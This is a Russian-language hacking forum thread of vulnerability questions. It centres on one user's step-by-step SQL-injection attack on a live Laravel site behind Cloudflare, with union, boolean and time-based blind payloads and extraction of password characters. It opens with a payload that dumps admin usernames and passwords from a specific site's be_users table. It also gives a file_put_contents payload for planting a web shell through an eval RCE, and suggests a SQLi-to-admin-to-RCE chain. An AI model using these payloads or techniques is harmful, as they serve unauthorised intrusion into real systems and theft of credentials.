Ваши вопросы по уязвимостям.

/sozialrecht/publikationen/detail/publication/a'=(extractvalue(0x0a,concat(0x0a,(select(group_concat(concat_ws(0x3a,username,password)))from(be_users)))))='a/

a'=(extractvalue(0x0a,concat(0x0a,(select(group_concat(substring(password,20,30)))from(be_users)where(username='rtisch')))))='a/

 

Хочу логировать все POST запросы к серверу, есть ли такая возможность без рута? Аналог tcpdump или какие-нибудь другие методы

 

Мониторинг трафика требует прямого обращение к сетевому интерфейсу и потому права рута (ну или права группы netdev). Возможно настроить апач/nginx что-бы они все сливали в лог. Вариант номер 3 это приписать логирование в приложение.

 

Имеется RCE eval($e), скачивание извне запрещены, system passthru и тд запрещено. Какие варианты залить Шелл? Отблагодарю

 

создать файл, данные постом передать

 

Запрещены где ? На хосте или waf-ом ?

 

подскажите как заюзать и достать бд

Code:

?search=-")+or+1=1+limit+10--+-

выодит 10 записей

Code:

?search=-")+order+by+1--+-

ошибки нет, но при order by 2 ошибка

Code:

?search=-")+union+select+1--+-

не выводит "1".

думал там какая то разновидность такого запроса. то есть вероятней всего результат первого запроса (уявимого) передается в WHERE для второго запроса

Code:

ids = SELECT id FROM users
WHERE group="XXXX" AND (name LIKE "%$GET['search']%" OR email LIKE "%$GET['search']%"
)
SELECT * FROM users WHERE id IN(ids)

сделал запрос типа

Code:

?search=-")+union+select+217--+-

где 217 это мой id. но результат пустой(

 

Есть новость что воровали банковские данные через иконку сайта, мол иконка выдавалась на всех страницах но на сранице оплаты выдавался js файл keylogger. Это как что за тэг там был что работал и favicon и js?

https://www.bleepingcomputer.com/ne...te-favicon-to-camouflage-credit-card-skimmer/

 

апдейт к предыдущему посту.

Code:

") union select 1 -- -

ошибка нет, 1 не выводит

Code:

") or id=2 union select 1 -- -

ошибка

 

что за ошибка?

 

ошибка не бд. просто человекоподобная, типа "Something went wrong"

небольшие размышления. синтаксис select такой

Code:

SELECT [STRAIGHT_JOIN]

       [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]

       [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS] [HIGH_PRIORITY]

       [DISTINCT | DISTINCTROW | ALL]

    select_expression,...

    [INTO {OUTFILE | DUMPFILE} 'file_name' export_options]

    [FROM table_references

      [WHERE where_definition]

      [GROUP BY {unsigned_integer | col_name | formula} [ASC | DESC], ...]

      [HAVING where_definition]

      [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC], ...]

      [LIMIT [offset,] rows]

      [PROCEDURE procedure_name]

      [FOR UPDATE | LOCK IN SHARE MODE]]

когда использую `ORDER BY1` или `LIMIT 1`, то нет ошибок. но при использование `GROUP BY1` ошибка. то есть вроятней иньекция находится после GROUP BY, думаю ок, наверное поиск реализован в HAVING. попробовал `HAVING 1=1`, ошибки нет. но использовать два `HAVING` нельзя

 

Code:

rce=@file_put_contents($_POST[f],$_POST[c]);&f=./filename.php&c=<?php phpinfo(); ?>

Code:

")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше
")*-1 UNION SELECT "'\"\\" -- // если ошибка, значит результат уходит в другой запрос, крутим по обстоятельствам
") OR SUBSTRING((SELECT VERSION()),1,1)=5 LIMIT 1 -- // boolean based true, есть вывод чего либо
") OR SUBSTRING((SELECT VERSION()),1,1)=1 LIMIT 1 -- // boolean based false, вывода нет
") AND IF(SUBSTRING((SELECT VERSION()),1,1)=5,SLEEP(100),SLEEP(0)); -- // крутим time based

Оригинал: https://blog.malwarebytes.com/threat-analysis/2020/05/credit-card-skimmer-masquerades-as-favicon/

Cервер отдавал JS только при "правильных" реферах, иначе выплёвывалась картинка. Браузер не подгружает левые майм типы для скриптов (script src) и ошибок никаких не возникает. А сделан сей трик, по всей видимости, для затруднения детекта автоматическими сканерами и анализаторами безопасности.

Статья немного вводит в заблуждение

 

Code:

")*-1 UNION SELECT 1 -- если вывода нет, чекаем дальше

вывода и ошибки нет. но если левый запрос, который перед union вернет хотя бы одну строку то будет ошибка. например

Code:

com%")*-1 UNION SELECT 1

а что значит "*-1" ?

 

Простое произведение, при котором получается отрицательное значение

Запрос может быть сложный, многострочный, результат уходить в другой запрос, но при этом фильтроваться корректно и т.д. и т.п. Чтоб не гадать на кофейной гуще, можно считать текущий запрос посимвольно, как-то так:

Code:

SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"

 

нашел способ быстро крутить запрос по символам

Code:

sdfsdf") or id=(select INSTR(' !"#`$%&()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_', (SELECT SUBSTRING(INFO,1,1) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%selfquery%"))) or ("qwerty

мб кому то будет полезно))


нашел запрос (ps: все записал в апперкейсе так как INSTR caseinsensetive и не стал парится по этому поводу)

Code:

SELECT
    `USERS`.*,
    (
    SELECT COUNT(*) FROM `USERS` AS `LARAVEL_RESERVED_0`
        WHERE `USERS`.`ID` = `LARAVEL_RESERVED_0`.`REFERRER_ID` AND`LARAVEL_RESERVED_0`.`DELETED_AT` IS NULL
    ) AS `REFERRALS_COUNT`
    FROM `USERS`
    WHERE `REFERRER_ID` = ?  AND(
            `EMAIL` LIKE ? OR `IP` LIKE ?
OR CONCAT_WS('', LAST_NAME, '', NAME, '', MIDDLE_NAME) LIKE "%{INJECTION_HERE}%" OR `id`= ?) AND `USERS`.`DELETED_AT` IS NULL  ORDER BY  `ID` DESC LIMIT 20 OFFSET 0

вместо всех вопросов подставляется $_GET['search'] кроме `REFERRER_ID` = ?
но уязвивымый только CONCAT_WS('', LAST_NAME, '', NAME, '', MIDDLE_NAME) так как он идет в обход prepard statement

если там многострочный запрос, то думаю так обходить

Code:

notfound") union select *, 134 as 'referrals_count' from users where id=1 or (name="

снова ошибка....хотя локально воспроизвел и все ок

и не могу понять почему `notfound") union select 1 from users where id=1 or (name="` ошибок нет. но если убрать notfound то ошибка

сайт под cloudflare. мб как то фильтрует

количество колонок в таблице users = 36. +1 за REFERRALS_COUNT
попробовал union select 1,2,....37 ---
ошибка(


еще немного инфы

Code:

") or 1=1 limit 10 offset 0 -- -

возвращает первые 10

Code:

") or 1=1 limit 10 offset 1 -- -

ничего не возвращает

Code:

") or id=(select count(*) from users where id in (1,2,3,4) limit 1)  -- -

выводит запись под id=4. как так? мозг кипит...

 

Советую ознакомиться с техниками которые описаны на rdot.org, там гуру скуль инъекций дожали из блайндов всё что можно и даже больше.

Конкретно в этом запросе обходить ничего не нужно, инъекция находится в последней строке и многострочность не мешает. Другое дело, когда мы вклиниваемя в подзапрос, к примеру.

Смею предположить, что запрос не тот, иначе это выглядит как минимум странно Каким образом был прочитан текущий запрос? Нужно постараться прочитать именно тот, где внедряется конструкция "UNION SELECT" и в зависимости от логики, найти два состояния, чтоб читать булеевым методом, либо работать по времени. Вот пара абстрактных примеров:

Code:

")*-1 UNION SELECT 1 FROM (SELECT 1)a WHERE SUBSTRING((SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"),1,1)="S" -- 1
")*-1 UNION SELECT IF(SUBSTRING((SELECT INFO FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%123%"),1,1)="S",SLEEP(2),SLEEP(0)) -- 1

 

вот так

Code:

sdfsdf") or id=(select INSTR(' !"#`$%&()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_', (SELECT SUBSTRING(INFO,1,1) FROM INFORMATION_SCHEMA.PROCESSLIST WHERE INFO LIKE "%selfquery%"))) or ("qwerty

согласен. но как обьяснить вот это

Code:

?search=com // возвращает строки с `com`
?search=qwerty // нет строк с таким вхождением
com") union select 1 -- - // ошибка
qwerty") union select 1 -- - // ошиби нет, ничего не возвращает

 

Вполне возможно, что имеет место серия уязвимых к внедрению запросов. И тот который считался, идёт раньше того, в котором совершается выборка одного поля, поэтому, как указал ранее, нужно получить запрос в котором UNION успешно отрабатывает и отталкиваться от него. Но и это, не гарантирует успешного видимого вывода, но понять происходящее лучше, должно помочь.

 

спасибо. таки да, есть второй запрос для пагинации

Code:

select count(*) as aggregate from `users` where `referrer_id` = ? and ( `email` like ? or `ip` like ? or concat_ws("", last_name, "", name, "midlle_name") like "%inject here%") and `users`.`deleted_at` is null order by  `id` desc limit 20 offset 0

получается если он возвращает 0, то второй запрос (который писал в пред. посте) не выполняется. это вполне обьясняет вот это поведение

есть варианты как можно обойти ситауцию когда иньекция попадает в два запроса с раным количеством колонок и все же воспользоватся union based


или мб есть способ как в sql из колонок сделать строки

Code:

 ") or id in(select ascii(substring(pass,1,1)),ascii(substring(pass,2,1)),ascii(substring(pass,3,1)) from users where id=xxxx) 

 

Есть как минимум два уязвимых запроса, а может быть три или больше, случай не простой, есть над чем подумать и развернуться. Стоит посмотреть в сторону фрагментированных инъекций или объединённых запросов, варианты есть и пока они не проверены, утверждать однозначно нельзя. В текущем состоянии дел, всё сильно зависит от окружения, контекста и соответсвенно выбранного вектора атаки. Думаю, что на этом моменте, не имеет смысла описывать абстракные техники, уже не целесообразно, нужно работать с конкретным случаем напрямую.
Это что касается инъекции, но вполне возможно, что классическая схема SQLi => Admin => RCE, в данном случае будет куда предпочтительнее, чем просто видимая скуля.